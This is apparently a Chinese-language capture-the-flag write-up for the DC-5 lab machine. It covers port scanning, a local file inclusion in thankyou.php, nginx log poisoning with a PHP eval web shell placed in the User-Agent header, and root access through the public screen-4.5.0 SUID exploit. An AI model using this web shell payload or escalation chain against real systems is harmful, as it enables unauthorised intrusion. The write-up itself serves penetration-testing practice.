DC-5

• DC-5
  • 1 資訊收集
  • 2 再看看web
  • 3 提權

1 資訊收集

先找存活主機，確定ip後再掃全埠，開啟了nfs和http服務

{"ip":"192.168.68.90","port":110,"service":"","Banner":"","url":""}
{"ip":"192.168.68.90","port":80,"service":"http","Banner":"","url":"http://192.168.68.90:80"}
{"ip":"192.168.68.90","port":111,"service":"","Banner":"","url":""}
{"ip":"192.168.68.90","port":58580,"service":"nfs","Banner":"","url":""}
{"ip":"192.168.68.90","port":25,"service":"","Banner":"","url":""}
{"url":"http://192.168.68.90:80","StatusCode":200,"Title":"Welcome","HeaderDigest":"server:nginx/1.6.2","Length":4025,"KeywordFinger":"","HashFinger":""}
 

看了下web，只有個表單提交功能，但這個版本的nginx有任意解析漏洞

也看了下nfs，沒有註冊，用不了，那隻能是web了

2 再看看web

掃了下目錄，也只有這幾個

開Burp，挨著點一遍，看看資料包，看了半天也沒看出來有啥入手點，然後在提交表單後的頁面ctrl + r重新整理了十幾次，發現頁面底部的Copyright © 2019會變，前面掃出來了footer.php，抓包看看

兩個包的時間不同，猜測是根據當前時間來生成年份的

那麼，thankyou.php這個頁面應該是包含了footer.php ，但這個包含大概率在php裡<?php do_sth(); include("footer.php"); ?>

去看了眼wp，感覺多少有點腦洞，正常業務不需要file引數來包含footer.php，那就是專門留出來的漏洞了。。。

試了下用不了偽協議，只能包含檔案（日誌/session），日誌有UA頭，所以把一句話寫在UA裡好一點（避免編碼問題）

GET /xxx HTTP/1.1
Host: 192.168.68.90
User-Agent: <?php eval($_REQUEST[x]); ?>

蟻劍連上去，web log目錄：/var/log/nginx/access.log

3 提權

先反彈個shell，蟻劍的shell太難用

看看passwd，有兩個可用賬號，dc和root

root:x:0:0:root:/root:/bin/bash
dc:x:1000:1000:dc,,,:/home/dc:/bin/bash

上LinEnum.sh看看，沒有直接可利用的操作，但這裡面有第三方工具screen，(這東西我以前用過，沒tmux好用），之前有看到過這類軟體可能會存在提權漏洞，順著看了看

[-] SUID files:
-rwsr-xr-x 1 root root 40168 May 18  2017 /bin/su
-rwsr-xr-x 1 root root 40000 Mar 30  2015 /bin/mount
-rwsr-xr-x 1 root root 27416 Mar 30  2015 /bin/umount
-rwsr-xr-x 1 root root 1441352 Apr 19  2019 /bin/screen-4.5.0
-rwsr-xr-x 1 root root 75376 May 18  2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 89248 Nov 19  2017 /usr/bin/procmail
-rwsr-sr-x 1 daemon daemon 55424 Sep 30  2014 /usr/bin/at
-rwsr-xr-x 1 root root 54192 May 18  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 53616 May 18  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 39912 May 18  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44464 May 18  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 464904 Mar 25  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 294512 Nov 22  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10104 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 1031296 Feb 11  2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 90456 Aug 13  2014 /sbin/mount.nfs

用screen -list看了下會話是空的，去搜了下screen 提權，發現存在exp，直接用searchsploit搜

把41154.sh傳到目標機器，執行

拿到flag